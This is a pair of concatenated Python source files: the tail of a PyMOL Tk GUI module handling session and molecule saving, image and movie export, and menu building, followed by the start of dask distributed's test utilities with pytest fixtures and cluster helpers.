self.cmd.log("save %s,format=pse\n"%(self.save_file),
"cmd.save('%s',format='pse')\n"%(self.save_file))
# self.cmd.save(self.save_file,"","pse",quiet=0)
# self.cmd.set("session_changed",0)
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file) # do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return self.session_save_as()
def session_save_as(self):
(self.initialdir, self.save_file) = os.path.split(self.get_current_session_file())
(save_file, def_ext) = os.path.splitext(self.save_file)
sfile = asksaveasfilename(defaultextension = _def_ext(def_ext),
initialfile = save_file,
initialdir = self.initialdir,
filetypes=[
("PyMOL Session File","*.pse"),
("PyMOL Show File","*.psw"),
])
if len(sfile):
if re.search(r"\.pse$|\.PSE$|\.psw$|\.PSW$",sfile)==None:
sfile=sfile+".pse"
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s,format=pse\n"%(sfile),
"cmd.save('%s',format='pse')\n"%(sfile))
# self.cmd.save(sfile,"",format='pse',quiet=0)
# self.cmd.set("session_changed",0)
self.save_file = sfile
# self.cmd.set("session_file",self.save_file)
self.set_current_session_file(self.save_file)
# do this in the main thread to block cmd.quit, etc.
self.cmd.do("_ cmd.save('''%s''','','pse',quiet=0)"%self.save_file)
self.cmd.do("_ cmd.set('session_changed',0)")
return 1
else:
return 0
def file_save(self):
"""
File->Save Molecule, now with filtering
"""
def command(result):
if result == 'OK':
self.file_save2(
dialog.getcurselection(),
multiple_files_option.getvalue(),
states_option.getvalue())
self.my_withdraw(dialog)
def update_save_listbox():
lst = self.cmd.get_names('public')
searchstr = filter_entry.getvalue()
if searchstr:
lst = [x for x in lst if searchstr in x]
dialog.component("scrolledlist").setlist(lst)
dialog = Pmw.SelectionDialog(self.root,
title="Save",
buttons = ('OK', 'Cancel'),
defaultbutton='OK',
scrolledlist_labelpos=N,
scrolledlist_listbox_selectmode=EXTENDED,
label_text='Which object or selection would you like to save?',
scrolledlist_items = (), # used to be 'lst'
command = command)
filter_entry = Pmw.EntryField(dialog.interior(),
labelpos='w',
modifiedcommand=update_save_listbox,
validate=None,
value="",
label_text="Filter:")
filter_entry.pack(pady=6, fill='x', expand=0, padx=10)
multiple_files_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text="Save to...",
buttontype="radiobutton",
)
multiple_files_option.add("one file")
multiple_files_option.add("multiple files")
multiple_files_option.invoke("one file")
multiple_files_option.pack(side='left', pady=8)
states_option = Pmw.RadioSelect( dialog.interior(),
labelpos='w',
orient='vertical',
selectmode='single',
label_text='Saved state...',
buttontype="radiobutton"
)
states_option.add("all")
states_option.add("global")
states_option.add("object's current")
states_option.invoke("global")
states_option.pack(side='right', pady=8)
# The listbox is created empty. Fill it now.
update_save_listbox()
if len(dialog.component('scrolledlist').get()):
# set focus on the first item
listbox = dialog.component('scrolledlist')
listbox.selection_set(0)
self.my_show(dialog)
def file_save2(self, sels, multiple_files_flag, state_flag):
filetypes_save = [
("PDB File","*.pdb"),
("MOL File","*.mol"),
("MOL2 File","*.mol2"),
("MMD File","*.mmd"),
("PKL File","*.pkl"),
("SDF File","*.sdf"),
("PDBx/mmCIF","*.cif"),
("PQR","*.pqr"),
("Maestro","*.mae"),
("XYZ","*.xyz"),
]
if True:
# save N>1 objects to ONE file
if multiple_files_flag == "one file" and len(sels)>=1:
sfile = '_'.join(sels) if len(sels) < 3 else \
sels[0] + '-and-%d-more' % (len(sels) - 1)
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = sfile,
initialdir = self.initialdir,
filetypes=filetypes_save)
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = ' or '.join(["("+str(x)+")" for x in sels])
self.cmd.log("save %s,(%s)\n"%(sfile,save_sele),
"cmd.save('%s','(%s)')\n"%(sfile,save_sele))
if state_flag == "all":
self.cmd.save(sfile,"(%s)"%save_sele,state=0,quiet=0)
elif state_flag == "object's current":
ap = 0
for sel in sels:
s = int(self.cmd.get("state", str(sel)))
self.cmd.multisave(sfile,str(sel),state=s, quiet=0, append=ap)
ap = 1
else:
self.cmd.save(sfile,"(%s)"%save_sele,quiet=0)
return
else:
# save to many files
for curName in sels:
## print "Result is: ", result
## print "Sels is: ", sels
## print "CurName is: ", curName
## print "State flag is: ", state_flag
# The only special case for saving files is when the user selects a multi-state object
# and wants to save that to multiple files, each state in one file.
doSplit=False
if state_flag=='all':
stateSave = "0"
if len(sels)==1:
# print "User wants to split a file"
doSplit=True
elif state_flag=='global':
stateSave = self.cmd.get_state()
elif state_flag=="object's current":
stateSave = int(self.cmd.get("state",curName))
                    # print "Saving current object's state as: ", stateSave
else: # default to current global
                    stateSave = self.cmd.get_state()  # same default as the 'global' branch above
if True:
sfile = asksaveasfilename(defaultextension = _def_ext(".pdb"),
initialfile = curName,
initialdir = self.initialdir,
filetypes = filetypes_save)
# now save the file (customizing states as necessary)
# print "sfile is: ", sfile
if len(sfile):
# maybe use PDBSTRs for saving multiple files to multiple states
self.initialdir = os.path.dirname(sfile)
save_sele = str("("+curName+")")
if doSplit:
# save each state in "save_sele" to file "sfile" as 'sfile_stateXYZ.pdb'
s = self.cmd.count_states(save_sele)
for stateSave in range(1,int(s)+1):
save_file = sfile
# _state004
inter = "_state" + str(stateSave).zfill(len(str(s))+1)
                                    # split the filename into base + extension so the
                                    # state suffix is inserted before the extension
                                    g = re.search(r"(.*)(\..*)$", save_file)
if g!=None:
# 1PDB_state004.pdb
save_file = g.groups()[0] + inter + g.groups()[1]
else:
# user entered a file w/o an extension name: eg, '1abc'
# this saves to, '1abc_state00XYZ'
save_file = save_file + inter
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
else:
save_file = sfile
# just save current selection to one file
self.cmd.log("save %s,(%s)\n"%(save_file,save_sele),
"cmd.save('%s','(%s)', state='%s')\n"%(save_file,save_sele,stateSave))
self.cmd.save(save_file,"(%s)"%save_sele,state=stateSave,quiet=0)
def edit_pymolrc(self):
from pmg_tk import TextEditor
TextEditor.edit_pymolrc(self)
def file_run(self):
ofile = askopenfilename(initialdir = os.getcwd(),
filetypes=[("All Runnable","*.pml"),
("All Runnable","*.pym"),
("All Runnable","*.py"),
("All Runnable","*.pyc"),
("PyMOL Script","*.pml"),
("Python Program","*.py"),
("Python Program","*.pyc"),
("PyMOL Program","*.pym"),
("All Files","*.*"),
("All Files","*"),
])
if len(ofile):
self.__script__ = ofile
            if re.search(r"\.pym*$|\.PYM*$", ofile):
                self.cmd.do("run " + ofile)
            else:
                self.cmd.do("@" + ofile)
def file_save_png(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".png"),
initialdir = self.initialdir,
filetypes=[("PNG File","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("png %s\n"%sfile,"cmd.png('%s')\n"%sfile)
self.cmd.png(sfile,quiet=0)
def file_save_wrl(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".wrl"),
initialdir = self.initialdir,
filetypes=[("VRML 2 WRL File","*.wrl")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_dae(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".dae"),
initialdir = self.initialdir,
filetypes=[("COLLADA File","*.dae")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_pov(self):
sfile = asksaveasfilename(defaultextension = _def_ext(".pov"),
initialdir = self.initialdir,
filetypes=[("POV File","*.pov")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("save %s\n"%sfile,"cmd.save('%s')\n"%sfile)
self.cmd.save(sfile,quiet=0)
def file_save_mpeg(self):
try:
from pymol import mpeg_encode
if not mpeg_encode.validate():
print("produce-error: Unable to validate pymol.mpeg_encode")
raise
except:
tkMessageBox.showerror("Error",
"MPEG encoder missing.\nThe FreeMOL add-ons may not be installed.")
return
def command(value):
mQual = int(w_quality.get())
mode = 'ray' if w_ray.get() else 'draw'
viewport = int(w_viewport[0].get()), int(w_viewport[1].get())
dialog.destroy()
if value != 'OK':
return
sfile = asksaveasfilename(defaultextension = _def_ext(".mpg"),
initialdir = self.initialdir,
filetypes=[("MPEG movie file","*.mpg")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
mQual = self.cmd.get_setting_int("movie_quality")
self.cmd.log("movie.produce %s,quality=%d,quiet=0\n"%(sfile,mQual),
"cmd.movie.produce('''%s''',quality=%d,quiet=0)\n"%(sfile,mQual))
self.cmd.movie.produce(sfile, mode, quality=mQual, quiet=0,
width=viewport[0], height=viewport[1])
dialog = Pmw.Dialog(title='Movie Settings', buttons=('OK', 'Cancel'),
defaultbutton='OK', command=command)
parent = dialog.interior()
gridkw = {'padx': 5, 'pady': 5, 'sticky': W, 'row': 0}
Label(parent, text='Encoding Quality (0-100)',).grid(column=0, **gridkw)
w_quality = Pmw.Counter(parent,
entryfield_value=self.cmd.get_setting_int("movie_quality"),
entryfield_validate={'validator': 'integer', 'min': 0, 'max': 100})
w_quality.grid(column=1, **gridkw)
gridkw['row'] += 1
Label(parent, text='Ray Trace Frames').grid(column=0, **gridkw)
w_ray = BooleanVar(parent, self.cmd.get_setting_boolean('ray_trace_frames'))
Checkbutton(parent, variable=w_ray).grid(column=1, **gridkw)
w_viewport = []
for text, value in zip(('Width', 'Height'), self.cmd.get_viewport()):
gridkw['row'] += 1
Label(parent, text=text + ' (pixels)').grid(column=0, **gridkw)
w = Pmw.Counter(parent, entryfield_value=value, entryfield_validate={'validator': 'integer', 'min': 0})
w.grid(column=1, **gridkw)
w_viewport.append(w)
def file_save_mpng(self):
sfile = asksaveasfilename(initialdir = self.initialdir,
filetypes=[("Numbered PNG Files","*.png")])
if len(sfile):
self.initialdir = os.path.dirname(sfile)
self.cmd.log("mpng %s\n"%sfile,"cmd.mpng('%s')\n"%sfile)
self.cmd.mpng(sfile,modal=-1)
def cat_terms(self):
for path in [ "$PYMOL_PATH/LICENSE.txt", "$PYMOL_PATH/LICENSE.TXT", "$PYMOL_PATH/LICENSE" ]:
path = self.pymol.cmd.exp_path(path)
if os.path.exists(path):
print(open(path).read().strip())
return
print(" Error: no license terms found.")
def toggleClickThrough(self, toggle):
if toggle:
os.system(
"defaults write com.apple.x11 wm_click_through -bool true")
os.system(
"defaults write org.x.X11 wm_click_through -bool true")
os.system(
"defaults write com.apple.x11 wm_ffm -bool true")
os.system(
"defaults write org.x.X11 wm_ffm -bool true")
print("Enabled wm_click_through and wm_ffm.", end=' ')
else:
os.system(
"defaults write com.apple.x11 wm_click_through -bool false")
os.system(
"defaults write org.x.X11 wm_click_through -bool false")
os.system(
"defaults write com.apple.x11 wm_ffm -bool false")
os.system(
"defaults write org.x.X11 wm_ffm -bool false")
print("Disabled wm_click_through and wm_ffm.", end=' ')
print("Please restart X11.")
def createMenuBar(self):
self.menuBar = Pmw.MenuBar(self.root, balloon=self.balloon,
hull_relief=RAISED, hull_borderwidth=1)
self.menuBar.pack(fill=X)
addmenuitem = self.menuBar.addmenuitem
addcascademenu = self.menuBar.addcascademenu
self.setting = Setting(self.app)
def _addmenu(data, parent):
for item in data:
if item[0] == 'separator':
addmenuitem(parent, 'separator', '')
elif item[0] == 'menu':
label = item[1]
menulabel = parent + '/' + label
self.menuBar.addcascademenu(parent, menulabel,
label, label=label, tearoff=FALSE)
_addmenu(item[2], menulabel)
elif item[0] == 'command':
label = item[1]
command = item[2]
if command is None:
if DEBUG:
print('warning: skipping', label, parent)
else:
if isinstance(command, str):
command = lambda c=command: self.cmd.do(c)
addmenuitem(parent, 'command', label, label=label, command=command)
elif item[0] == 'check':
label = item[1]
var = getattr(self.setting, item[2])
if len(item) > 4:
addmenuitem(parent, 'checkbutton', label, label=label, variable=var, onvalue=item[3], offvalue=item[4])
else:
addmenuitem(parent, 'checkbutton', label, label=label, variable=var)
elif item[0] == 'radio':
label = item[1]
var = getattr(self.setting, item[2])
value = item[3]
addmenuitem(parent, 'radiobutton', label=label, value=value, variable=var)
elif DEBUG:
print('error:', item)
for _, label, data in self.get_menudata():
assert _ == 'menu'
self.menuBar.addmenu(label, label, tearoff=TRUE)
_addmenu(data, label)
# self.menuBar.addmenuitem('Help', 'command', 'Release Notes',
# label='Release Notes',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('release')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Commands',
# label='Commands',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('commands')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Launching',
# label='Launching',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('launching')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Select Command',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('select')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Selections',
# label='Selection Syntax',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('selections')"))
# self.menuBar.addmenuitem('Help', 'command', 'Example Selections',
# label='Selection Examples',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('examples')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Mouse',
# label='Mouse',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('mouse')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on the Keyboard',
# label='Keyboard',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('keyboard')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('editing')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Molecular Editing',
# label='Molecular Editing Keys',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('edit_keys')"))
# self.menuBar.addmenuitem('Help', 'command', 'Help on Stereo',
# label='Stereo',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('stereo')"))
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'command', 'Help on the API',
# label='API',
# command = lambda s=self: s.cmd.do("_ cmd.show_help('api')"))
# self.toggleBalloonVar = IntVar()
# self.toggleBalloonVar.set(0)
# self.menuBar.addmenuitem('Help', 'separator', '')
# self.menuBar.addmenuitem('Help', 'checkbutton',
# 'Toggle balloon help',
# label='Balloon help',
# variable = self.toggleBalloonVar,
# command=self.toggleBalloon)
if sys.platform == 'win32' and self.app.pymol.invocation.options.incentive_product:
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command',
'Copy Image',
label='Copy Image to Clipboard',
command = lambda s=self:s.cmd.copy_image(quiet=0))
self.menuBar.addmenuitem('Edit', 'checkbutton',
'Auto-Copy Images',
label='Auto-Copy Images',
variable = self.setting.auto_copy_images,
)
self.menuBar.addmenuitem('Edit', 'separator', '')
self.menuBar.addmenuitem('Edit', 'command',
'To Copy Text: Use Ctrl-C in TclTk GUI',
label='To copy text use Ctrl-C in the TclTk GUI',
state='disabled',
command = None)
self.menuBar.addmenuitem('Edit', 'command',
'To Paste Text, Use Ctrl-V in TclTk GUI',
                                     label='To paste text use Ctrl-V in the TclTk GUI',
state='disabled',
command = None)
if sys.platform == 'darwin':
self.menuBar.addmenuitem('Mouse', 'separator', '')
self.menuBar.addcascademenu('Mouse', 'MacX11Focus', 'Mac OS X11',
label='Mac OS X11')
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Enable Click Through',
label='Enable Click Through',
command = lambda s=self:
s.toggleClickThrough(1))
self.menuBar.addmenuitem('MacX11Focus', 'command',
'Disable Click Through',
label='Disable Click Through',
command = lambda s=self:
s.toggleClickThrough(0))
# hook up scene menu updates
index = self.pymol.setting.index_dict.get('scenes_changed')
self.setting.active_dict[index] = self.update_scene_menu
def settings_edit_all_dialog(self):
SetEditor(self)
def edit_colors_dialog(self):
ColorEditor(self)
def update_scene_menu(self):
scene_list = self.cmd.get_scene_list()
for action in ['recall', 'clear']:
parent = 'Scene/' + action.capitalize()
self.menuBar.deletemenuitems(parent, 0, 999)
for k in scene_list:
self.menuBar.addmenuitem(parent, 'command', k, label=k,
command=lambda k=k, a=action: self.cmd.scene(k, a))
parent = 'Scene/Store'
self.menuBar.deletemenuitems(parent, 0, 11)
for i in range(12):
k = 'F' + str(i + 1)
self.scene_F_keys[i].set(1 if k in scene_list else 0)
self.menuBar.addmenuitem(parent, 'checkbutton', k, label=k,
variable=self.scene_F_keys[i],
command=lambda k=k: self.cmd.scene(k, 'store'))
def show_about(self):
Pmw.aboutversion(self.appversion)
Pmw.aboutcopyright(self.copyright)
Pmw.aboutcontact(
'For more information, browse to: %s\n or send email to: %s' %\
(self.contactweb, self.contactemail))
self.about = Pmw.AboutDialog(self.root, applicationname=self.appname)
self.my_activate(self.about)
self.about.withdraw()
def createInterface(self):
self.balloon = Pmw.Balloon(self.root)
self.createMenuBar()
self.app.menuBar = self.menuBar # to support legacy plugins
self.app.initializePlugins()
self.createDataArea()
self.createCommandArea()
self.createButtons()
self.createMessageBar()
self.createConsole()
def setup(self):
# call the parent method
PMGSkin.setup(self)
# name the application
self.root.title(self.appname)
# create the user interface
self.createInterface()
# pack the root window
self.app._hull.pack(side=LEFT, fill=BOTH, expand=YES, anchor=CENTER)
# and set focus
if hasattr(self,'entry'): self.entry.focus_set()
def takedown(self):
self.destroyMessageBar()
self.destroyDataArea()
self.destroyCommandArea()
self.destroyButtonArea()
self.balloon.destroy()
self.menuBar.destroy()
def __init__(self,app):
global root
root = app.root
PMGSkin.__init__(self,app)
Normal.appversion = app.pymol.cmd.get_version()[0]
Normal.appversion += " Incentive Product" \
if app.pymol.invocation.options.incentive_product else \
" Open-Source"
self.app = app
self.save_file = ''
self.cmd = app.pymol.cmd
self.util = app.pymol.util
self.movie_command = None
self.movie_start = 1
self.auto_overlay = None
self.edit_mode = None
self.valence = None
self._initialdir = ''
self.fixedfont = tkFont.nametofont('TkFixedFont')
self.scene_F_keys = [IntVar(root) for _ in range(12)]
def __init__(app):
return Normal(app)
|
utils_test.py
|
import asyncio
import collections
import copy
import functools
import gc
import inspect
import io
import itertools
import logging
import logging.config
import os
import queue
import re
import shutil
import signal
import socket
import subprocess
import sys
import tempfile
import threading
import uuid
import warnings
import weakref
from contextlib import contextmanager, nullcontext, suppress
from glob import glob
from time import sleep
from distributed.scheduler import Scheduler
try:
import ssl
except ImportError:
ssl = None
import pytest
from tlz import assoc, memoize, merge
from tornado import gen
from tornado.ioloop import IOLoop
import dask
from distributed.comm.tcp import TCP
from . import system
from .client import Client, _global_clients, default_client
from .comm import Comm
from .compatibility import WINDOWS
from .config import initialize_logging
from .core import CommClosedError, ConnectionPool, Status, connect, rpc
from .deploy import SpecCluster
from .diagnostics.plugin import WorkerPlugin
from .metrics import time
from .nanny import Nanny
from .proctitle import enable_proctitle_on_children
from .security import Security
from .utils import (
DequeHandler,
TimeoutError,
_offload_executor,
get_ip,
get_ipv6,
iscoroutinefunction,
log_errors,
mp_context,
reset_logger_locks,
sync,
thread_state,
)
from .worker import Worker
try:
import dask.array # register config
except ImportError:
pass
logger = logging.getLogger(__name__)
logging_levels = {
name: logger.level
for name, logger in logging.root.manager.loggerDict.items()
if isinstance(logger, logging.Logger)
}
_TEST_TIMEOUT = 30
_offload_executor.submit(lambda: None).result() # create thread during import
@pytest.fixture(scope="session")
def valid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("print('hello world!')")
return local_file
@pytest.fixture(scope="session")
def client_contract_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("distributed_script.py")
lines = (
"from distributed import Client",
"e = Client('127.0.0.1:8989')",
"print(e)",
)
local_file.write("\n".join(lines))
return local_file
@pytest.fixture(scope="session")
def invalid_python_script(tmpdir_factory):
local_file = tmpdir_factory.mktemp("data").join("file.py")
local_file.write("a+1")
return local_file
async def cleanup_global_workers():
for worker in Worker._instances:
await worker.close(report=False, executor_wait=False)
@pytest.fixture
def loop():
with check_instances():
with pristine_loop() as loop:
# Monkey-patch IOLoop.start to wait for loop stop
orig_start = loop.start
is_stopped = threading.Event()
is_stopped.set()
def start():
is_stopped.clear()
try:
orig_start()
finally:
is_stopped.set()
loop.start = start
yield loop
# Stop the loop in case it's still running
try:
sync(loop, cleanup_global_workers, callback_timeout=0.500)
loop.add_callback(loop.stop)
except RuntimeError as e:
if not re.match("IOLoop is clos(ed|ing)", str(e)):
raise
except TimeoutError:
pass
else:
is_stopped.wait()
@pytest.fixture
def loop_in_thread():
with pristine_loop() as loop:
thread = threading.Thread(target=loop.start, name="test IOLoop")
thread.daemon = True
thread.start()
loop_started = threading.Event()
loop.add_callback(loop_started.set)
loop_started.wait()
yield loop
loop.add_callback(loop.stop)
thread.join(timeout=5)
@pytest.fixture
def zmq_ctx():
import zmq
ctx = zmq.Context.instance()
yield ctx
ctx.destroy(linger=0)
@contextmanager
def pristine_loop():
IOLoop.clear_instance()
IOLoop.clear_current()
loop = IOLoop()
loop.make_current()
assert IOLoop.current() is loop
try:
yield loop
finally:
try:
loop.close(all_fds=True)
except (KeyError, ValueError):
pass
IOLoop.clear_instance()
IOLoop.clear_current()
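# Usage sketch (not part of the original helpers): pristine_loop() hands out a
# fresh, current IOLoop and guarantees it is closed and deregistered afterwards,
# so tests do not leak loops or file descriptors into each other.
def _example_pristine_loop_usage():
    async def probe():
        return 42

    with pristine_loop() as loop:
        assert loop.run_sync(probe) == 42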
@contextmanager
def mock_ipython():
from unittest import mock
from distributed._ipython_utils import remote_magic
ip = mock.Mock()
ip.user_ns = {}
ip.kernel = None
def get_ip():
return ip
with mock.patch("IPython.get_ipython", get_ip), mock.patch(
"distributed._ipython_utils.get_ipython", get_ip
):
yield ip
# cleanup remote_magic client cache
for kc in remote_magic._clients.values():
kc.stop_channels()
remote_magic._clients.clear()
original_config = copy.deepcopy(dask.config.config)
def reset_config():
dask.config.config.clear()
dask.config.config.update(copy.deepcopy(original_config))
def nodebug(func):
"""
A decorator to disable debug facilities during timing-sensitive tests.
Warning: this doesn't affect already created IOLoops.
"""
@functools.wraps(func)
def wrapped(*args, **kwargs):
old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
try:
return func(*args, **kwargs)
finally:
if old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = old_asyncio_debug
return wrapped
def nodebug_setup_module(module):
"""
A setup_module() that you can install in a test module to disable
debug facilities.
"""
module._old_asyncio_debug = os.environ.get("PYTHONASYNCIODEBUG")
if module._old_asyncio_debug is not None:
del os.environ["PYTHONASYNCIODEBUG"]
def nodebug_teardown_module(module):
"""
A teardown_module() that you can install in a test module to reenable
debug facilities.
"""
if module._old_asyncio_debug is not None:
os.environ["PYTHONASYNCIODEBUG"] = module._old_asyncio_debug
def inc(x):
return x + 1
def dec(x):
return x - 1
def mul(x, y):
return x * y
def div(x, y):
return x / y
def deep(n):
if n > 0:
return deep(n - 1)
else:
return True
def throws(x):
raise RuntimeError("hello!")
def double(x):
return x * 2
def slowinc(x, delay=0.02):
sleep(delay)
return x + 1
def slowdec(x, delay=0.02):
sleep(delay)
return x - 1
def slowdouble(x, delay=0.02):
sleep(delay)
return 2 * x
def randominc(x, scale=1):
from random import random
sleep(random() * scale)
return x + 1
def slowadd(x, y, delay=0.02):
sleep(delay)
return x + y
def slowsum(seq, delay=0.02):
sleep(delay)
return sum(seq)
def slowidentity(*args, **kwargs):
delay = kwargs.get("delay", 0.02)
sleep(delay)
if len(args) == 1:
return args[0]
else:
return args
class _UnhashableCallable:
__hash__ = None
def __call__(self, x):
return x + 1
def run_for(duration, timer=time):
"""
Burn CPU for *duration* seconds.
"""
deadline = timer() + duration
while timer() <= deadline:
pass
# This dict grows at every varying() invocation
_varying_dict = collections.defaultdict(int)
_varying_key_gen = itertools.count()
class _ModuleSlot:
def __init__(self, modname, slotname):
self.modname = modname
self.slotname = slotname
def get(self):
return getattr(sys.modules[self.modname], self.slotname)
def varying(items):
"""
Return a function that returns a result (or raises an exception)
from *items* at each call.
"""
# cloudpickle would serialize the *values* of all globals
# used by *func* below, so we can't use `global <something>`.
# Instead look up the module by name to get the original namespace
# and not a copy.
slot = _ModuleSlot(__name__, "_varying_dict")
key = next(_varying_key_gen)
def func():
dct = slot.get()
i = dct[key]
if i == len(items):
raise IndexError
else:
x = items[i]
dct[key] = i + 1
if isinstance(x, Exception):
raise x
else:
return x
return func
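# Usage sketch (illustrative only, not used by any test here): varying() builds a
# stateful callable that replays `items` one per call, raising any exception
# instances it encounters and IndexError once the list is exhausted.
def _example_varying_usage():
    f = varying([1, ZeroDivisionError("boom"), 3])
    assert f() == 1
    with pytest.raises(ZeroDivisionError):
        f()
    assert f() == 3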
def map_varying(itemslists):
"""
Like *varying*, but return the full specification for a map() call
on multiple items lists.
"""
def apply(func, *args, **kwargs):
return func(*args, **kwargs)
return apply, list(map(varying, itemslists))
async def geninc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
async def asyncinc(x, delay=0.02):
await asyncio.sleep(delay)
return x + 1
_readone_queues = {}
async def readone(comm):
"""
Read one message at a time from a comm that reads lists of
messages.
"""
try:
q = _readone_queues[comm]
except KeyError:
q = _readone_queues[comm] = asyncio.Queue()
async def background_read():
while True:
try:
messages = await comm.read()
except CommClosedError:
break
for msg in messages:
q.put_nowait(msg)
q.put_nowait(None)
del _readone_queues[comm]
        # schedule the background reader; calling the coroutine function bare would
        # only create a coroutine object without ever running it
        asyncio.ensure_future(background_read())
msg = await q.get()
if msg is None:
raise CommClosedError
else:
return msg
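# Usage sketch (illustrative only): readone() is awaited inside a coroutine test to
# pull individual messages off a comm that delivers them in batches; `comm` below
# stands for an already-connected Comm instance.
async def _example_readone_usage(comm):
    first = await readone(comm)   # first message of the first batch read
    second = await readone(comm)  # next message, possibly from the same batch
    return first, second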
def run_scheduler(q, nputs, config, port=0, **kwargs):
with dask.config.set(config):
from distributed import Scheduler
        # Child processes may be spawned via fork() on Unix, so avoid inheriting
        # the parent's IO loop.
with pristine_loop() as loop:
async def _():
scheduler = await Scheduler(
validate=True, host="127.0.0.1", port=port, **kwargs
)
for i in range(nputs):
q.put(scheduler.address)
await scheduler.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_worker(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
from distributed import Worker
reset_logger_locks()
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Worker(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
def run_nanny(q, scheduler_q, config, **kwargs):
with dask.config.set(config):
with log_errors():
with pristine_loop() as loop:
scheduler_addr = scheduler_q.get()
async def _():
worker = await Nanny(scheduler_addr, validate=True, **kwargs)
q.put(worker.address)
await worker.finished()
try:
loop.run_sync(_)
finally:
loop.close(all_fds=True)
@contextmanager
def check_active_rpc(loop, active_rpc_timeout=1):
active_before = set(rpc.active)
yield
    # Some streams can take a bit of time to notice that their peer has closed:
    # a coroutine (*) may still be waiting on a CommClosedError before it gets
    # around to calling close_rpc(). This happens especially when a non-localhost
    # address is used, as Nanny does.
    # (*) example: gather_from_workers()
def fail():
pytest.fail(
"some RPCs left active by test: %s" % (set(rpc.active) - active_before)
)
async def wait():
await async_wait_for(
lambda: len(set(rpc.active) - active_before) == 0,
timeout=active_rpc_timeout,
fail_func=fail,
)
loop.run_sync(wait)
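# Usage sketch (illustrative only): check_active_rpc() wraps a test body and fails
# if the body leaves extra rpc objects active once it finishes.
def _example_check_active_rpc_usage(loop):
    with check_active_rpc(loop):
        pass  # test body that opens and properly closes its rpc connections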
@pytest.fixture
def cluster_fixture(loop):
with cluster() as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def s(cluster_fixture):
scheduler, workers = cluster_fixture
return scheduler
@pytest.fixture
def a(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[0]
@pytest.fixture
def b(cluster_fixture):
scheduler, workers = cluster_fixture
return workers[1]
@pytest.fixture
def client(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
# Compatibility. A lot of tests simply use `c` as fixture name
c = client
@pytest.fixture
def client_secondary(loop, cluster_fixture):
scheduler, workers = cluster_fixture
with Client(scheduler["address"], loop=loop) as client:
yield client
@contextmanager
def tls_cluster_context(
worker_kwargs=None, scheduler_kwargs=None, security=None, **kwargs
):
security = security or tls_only_security()
worker_kwargs = assoc(worker_kwargs or {}, "security", security)
scheduler_kwargs = assoc(scheduler_kwargs or {}, "security", security)
with cluster(
worker_kwargs=worker_kwargs, scheduler_kwargs=scheduler_kwargs, **kwargs
) as (s, workers):
yield s, workers
@pytest.fixture
def tls_cluster(loop, security):
with tls_cluster_context(security=security) as (scheduler, workers):
yield (scheduler, workers)
@pytest.fixture
def tls_client(tls_cluster, loop, security):
s, workers = tls_cluster
with Client(s["address"], security=security, loop=loop) as client:
yield client
@pytest.fixture
def security():
return tls_only_security()
@contextmanager
def cluster(
nworkers=2,
nanny=False,
worker_kwargs={},
